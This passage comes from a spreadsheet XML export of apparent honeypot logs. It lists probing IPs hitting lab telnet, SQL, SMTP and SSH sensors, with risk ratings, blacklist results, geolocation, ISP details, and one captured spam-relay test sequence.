    <d v="2025-04-09T17:56:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon City"/>
    <s v="1819607"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3182:9e8e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2429"/>
    <x v="2429"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:55:28"/>
    <d v="2025-04-09T17:53:00"/>
    <d v="2025-04-09T17:55:28"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="2007-05-04"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7449:dcb4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2430"/>
    <x v="2430"/>
    <s v="node-95l.pool-113-53.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-09T17:51:45"/>
    <d v="2025-04-09T17:51:45"/>
    <d v="2025-04-09T17:51:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Bon"/>
    <s v="Bang Bon"/>
    <s v="8355932"/>
    <s v="NA"/>
    <s v="13.6618"/>
    <s v="100.396"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7135:2e59"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2431"/>
    <x v="2431"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:47:14"/>
    <d v="2025-04-09T17:47:14"/>
    <d v="2025-04-09T17:47:14"/>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1:3b63"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2432"/>
    <x v="2432"/>
    <s v="NA&amp;&amp;syn-076-095-179-154.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-09T17:43:03"/>
    <d v="2025-04-04T22:01:04"/>
    <d v="2025-04-09T17:43:03"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Orange"/>
    <s v="Anaheim"/>
    <s v="5323810"/>
    <s v="92806"/>
    <s v="33.8362"/>
    <s v="-117.872"/>
    <s v="20001"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2006-12-22"/>
    <s v="RRWE"/>
    <s v="2007-12-18"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-07-27 04:00:00"/>
    <s v="2025-07-26 04:00:00"/>
    <s v="2024-07-22 05:41:39"/>
    <s v="['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Domain Admin"/>
    <x v="19"/>
    <s v="NA"/>
    <s v="12405 Powerscourt Drive"/>
    <s v="::ffff:4c5f:b39a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2433"/>
    <x v="2433"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:41:57"/>
    <d v="2025-04-09T17:41:57"/>
    <d v="2025-04-09T17:41:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Singānallūr"/>
    <s v="1256184"/>
    <s v="NA"/>
    <s v="10.999"/>
    <s v="77.0324"/>
    <s v="131269"/>
    <s v="CABLELITE-AS-AP"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="consumer"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31ce:730f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2434"/>
    <x v="2434"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:41:27"/>
    <d v="2025-03-05T12:05:50"/>
    <d v="2025-04-09T17:41:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="None"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:1c06"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2435"/>
    <x v="2435"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:35:43"/>
    <d v="2025-03-31T08:37:48"/>
    <d v="2025-04-09T17:35:43"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="75"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Jung-gu"/>
    <s v="Jung-gu"/>
    <s v="1845068"/>
    <s v="700-422"/>
    <s v="37.5601"/>
    <s v="126.996"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79b5:767b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2436"/>
    <x v="2436"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:35:42"/>
    <d v="2025-04-09T17:33:43"/>
    <d v="2025-04-09T17:35:42"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (AGS Layout)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9114"/>
    <s v="77.5384"/>
    <s v="150633"/>
    <s v="MARUTHI INTERNET PRIVATE LIMITED"/>
    <s v="Maruthi Internet Private Limited"/>
    <s v="business"/>
    <s v="NIXI"/>
    <s v="2023-02-06"/>
    <s v="MARUTHIS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6753:1ddd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2437"/>
    <x v="2437"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:16:08"/>
    <d v="2025-04-09T17:16:08"/>
    <d v="2025-04-09T17:16:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c4:3cea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2438"/>
    <x v="2438"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:45:25"/>
    <d v="2025-04-09T14:45:25"/>
    <d v="2025-04-09T14:45:25"/>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d7:1e46"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2439"/>
    <x v="2439"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:44:17"/>
    <d v="2025-04-09T14:44:17"/>
    <d v="2025-04-09T14:44:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1571"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2440"/>
    <x v="2440"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:26:44"/>
    <d v="2025-02-13T09:00:55"/>
    <d v="2025-04-09T14:26:44"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="NA&amp;&amp;25"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Pitline Ltd"/>
    <s v="2009-10-30"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Mar 2025 04:33:56 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 29 Mar 2025 02:47:26 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 30 Mar 2025 15:34:54 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 4 Apr 2025 07:30:37 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 4 Apr 2025 13:16:32 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 5 Apr 2025 01:52:47 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '122.170.7.108_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 8 Apr 2025 06:50:03 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3d3:bf3a"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2441"/>
    <x v="2441"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:10:54"/>
    <d v="2024-12-03T06:01:39"/>
    <d v="2025-04-09T14:10:54"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="JM"/>
    <s v="Jamaica"/>
    <s v="02"/>
    <s v="Saint Andrew Parish"/>
    <s v="Trench Town"/>
    <s v="Kingston"/>
    <s v="3489854"/>
    <s v="10"/>
    <s v="17.9892"/>
    <s v="-76.8024"/>
    <s v="11580"/>
    <s v="Island Networks Ltd"/>
    <s v="Island Networks Ltd"/>
    <s v="business"/>
    <s v="AGIS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cda4:ccec"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2442"/>
    <x v="2442"/>
    <s v="171-100-28-6.static.asianet.co.th&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:10:14"/>
    <d v="2025-03-04T07:04:14"/>
    <d v="2025-04-09T14:10:14"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Din Daeng"/>
    <s v="Din Daeng"/>
    <s v="6694101"/>
    <s v="NA"/>
    <s v="13.7967"/>
    <s v="100.574"/>
    <s v="7470"/>
    <s v="TRUE INTERNET CORPORATION CO. LTD."/>
    <s v="True Internet Corporation CO. Ltd."/>
    <s v="residential"/>
    <s v="Truenet CM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ab64:1c06"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2443"/>
    <x v="2443"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:08:50"/>
    <d v="2023-07-24T16:32:44"/>
    <d v="2025-04-09T14:08:50"/>
    <n v="136981"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;36144&amp;&amp;3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hai Bà Trưng District"/>
    <s v="Hai BàTrưng"/>
    <s v="8616127"/>
    <s v="NA"/>
    <s v="21.0134"/>
    <s v="105.848"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
